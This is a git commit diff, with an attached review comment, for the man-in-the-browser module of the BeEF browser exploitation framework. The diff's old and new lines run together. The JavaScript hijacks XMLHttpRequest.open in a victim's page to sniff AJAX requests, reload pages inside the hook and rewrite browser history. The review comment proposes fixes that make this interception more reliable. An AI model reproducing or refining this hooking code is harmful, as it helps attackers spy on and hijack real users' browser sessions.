Refactored mitm.js AJAX sniffing feature. Fixed a couple of other bugs in mitb.js

This commit is contained in:
antisnatchor
2012-12-30 13:13:10 +01:00
parent 0244980db0
commit d976e86cbe
2 changed files with 25 additions and 45 deletions


@@ -15,46 +15,30 @@ beef.mitb = {
beef.mitb.curl = curl; beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/ /*Override open method to intercept ajax request*/
var xml_type; var xml_type;
var hook_file = "<%= @hook_file %>";
if (window.XMLHttpRequest && !(window.ActiveXObject)) { if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override"); beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) { (function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) { XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
// Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
var portRegex = new RegExp(":[0-9]+"); // or a request initiated by the MiTB itself.
var portR = portRegex.exec(url); if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
/*return :port*/ open.call(this, method, url, async, true);
var requestPort; }else {
var portRegex = new RegExp(":[0-9]+");
if (portR != null) { var portR = portRegex.exec(url);
requestPort = portR[0].split(":"); var requestPort;
} if (portR != null) { requestPort = portR[0].split(":")[1]; }
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
//GET request
if (method == "GET") { if (method == "GET") {
//GET request -> cross-domain
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) { if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url); beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url); window.open(url);
}else { //GET request -> same-domain
}
else {
beef.mitb.sniff("GET [Ajax Request]: " + url); beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) { if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = ""; var title = "";
@@ -63,26 +47,19 @@ beef.mitb = {
} else { } else {
title = document.getElementsByTagName("title")[0].innerHTML; title = document.getElementsByTagName("title")[0].innerHTML;
} }
/*write the url of the page*/ // write the url of the page
history.pushState({ Be:"EF" }, title, url); history.pushState({ Be:"EF" }, title, url);
} }
} }
}else{
} //POST request
else { beef.mitb.sniff("POST ajax request to: " + url);
/*if we are here we have an ajax post req*/ open.call(this, method, url, async, true);
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
} }
} }
}; };
})(XMLHttpRequest.prototype.open); })(XMLHttpRequest.prototype.open);
} }
}, },
// Initializes the hook on anchors and forms. // Initializes the hook on anchors and forms.
@@ -161,7 +138,7 @@ beef.mitb = {
fetchForm:function (url, query, target) { fetchForm:function (url, query, target) {
try { try {
var y = new XMLHttpRequest(); var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef"); y.open('POST', url, false, true);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () { y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") { if (y.readyState == 4 && y.responseText != "") {
@@ -181,7 +158,7 @@ beef.mitb = {
fetch:function (url, target) { fetch:function (url, target) {
try { try {
var y = new XMLHttpRequest(); var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef"); y.open('GET', url, false, true);
y.onreadystatechange = function () { y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") { if (y.readyState == 4 && y.responseText != "") {
@@ -204,7 +181,7 @@ beef.mitb = {
try { try {
var target = document.getElementsByTagName("html")[0]; var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest(); var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef"); y.open('GET', url, false, true);
y.onreadystatechange = function () { y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") { if (y.readyState == 4 && y.responseText != "") {
var title = ""; var title = "";
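Review bot: In the first hunk the new fourth parameter `mitb_call` sits in the position of XMLHttpRequest.open's standard `user` argument, so any page request that supplies HTTP credentials (`xhr.open(method, url, async, 'user', 'pass')`) is treated as an internal call and forwarded as `open.call(this, method, url, async, true)`, which replaces the username with `true` and drops the password entirely; the same forwarding appears on the POST branch and in the fetchForm/fetch hunks. Keeping `user, pass` in the signature and forwarding them unchanged, `open.call(this, method, url, async, user, pass);`, restores the page's own requests. Separately, `hook_file` is interpolated from the template on the new `var hook_file = "<%= @hook_file %>";` line; if it expands to an empty string, `url.indexOf(hook_file) != -1` is true for every URL because `indexOf('')` returns 0, so that condition should be guarded with `hook_file.length > 0 &&`. The override function starts inside the hunk but its enclosing `beef.mitb` object and the `@@ -63` continuation lie outside it.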


@@ -74,6 +74,9 @@ module BeEF
# @note set the XHR-polling timeout # @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout") hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path
hook_session_config['hook_file'] = config.get("beef.http.hook_file")
# @note if http_port <> public_port in config ini, use the public_port # @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil? unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] if hook_session_config['beef_port'] != hook_session_config['beef_public_port']